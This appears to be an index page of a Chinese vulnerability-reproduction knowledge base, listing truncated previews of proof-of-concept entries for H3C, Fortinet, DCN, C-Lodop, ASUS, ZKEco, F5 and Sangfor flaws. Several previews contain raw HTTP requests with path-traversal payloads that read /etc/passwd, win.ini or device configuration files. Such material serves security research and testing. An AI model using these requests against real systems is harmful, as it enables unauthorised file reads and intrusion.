- 简介
- 目录大纲
- 最新文档
ND001 h3c-miniware-web-disclosure
漏洞复现 ``` GET /userLogin.asp/../actionpolicy_status/../ER5200G2.cfg HTTP/1.1 Host: rlsbcs.xxx.cn:1234 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept-Encoding: gzi……
myh0st - 2025年9月16日 20:00
ND001 CVE-2018-13379
Fortinet FortiOS路径遍历漏洞(CNNVD-201905-1026、CVE-2018-13379) 漏洞源于该系统未能正确地过滤资源或文件路径中的特殊元素,导致攻击者可以利用该漏洞访问受限目录以外的位置。Fortinet FortiOS 5.6.3 版本至 5.6.7 版本、6.0.0 版本至 6.0.4 版本中的 SSL VPN 受此漏洞影响。 可访问链接查看是否存在漏洞 /rem……
myh0st - 2025年9月10日 18:12
ND003 DCN-Router-online_list-fileread
神州数码DCN系统接口online_list.php存在任意文件读取漏洞 poc ```javascript POST /function/auth/user/online_list.php HTTP/1.1 Host: oa.xazlsec.com:8888 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/……
myh0st - 2025年9月10日 15:02
ND001 clodop-printer-lfi
漏洞复现 ``` GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini HTTP/1.1 Host: oa.xazlsec.com:9500 User-Agent: Mozilla/5.0 Connection: close Referer: https://127.……
myh0st - 2025年9月10日 11:24
ND001 ASUS-router-error_page-lfi
敏感信息泄漏漏洞 漏洞复现: ``` GET /error_page.htm?current_lang=/////etc/passwd HTTP/1.1 Host: rap.xazlsec.net.cn:881 User-Agent: Mozilla/5.0 Connection: close Referer: https://127.0.0.1/Main_Login.asp Accept-Enc……
myh0st - 2025年9月9日 17:12
ND003 e-zkeco-iclock-ic1ock-sqlinject
漏洞复现 ``` POST /iclock/ic1ock HTTP/1.1 Host: www.xazlsec.cn:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Content-Length: 66 Connection: close Conten……
myh0st - 2025年8月26日 11:11
ND999 F5 Tmsh命令执行
在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。 未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。 影响范围 BIG-IP 15.x: 15.1.0/15.0.0 BIG-IP 14.x……
myh0st - 2025年8月21日 15:01
ND002 sangfor-ngaf-login-rce
最近,深信服下⼀代防⽕墙曝光了远程代码执⾏漏洞。此漏洞通过绕过身份认证和注⼊ cookie 的⽅式来执⾏系统命令,公开的利⽤⽅式受到诸多限制且命令执⾏⽆回显,并且当⽬标机器不出⽹时,该漏洞利⽤⽅式便⽆法发挥作⽤,因此⽆法满⾜实际攻防场景的需求。
myh0st - 2025年8月13日 11:35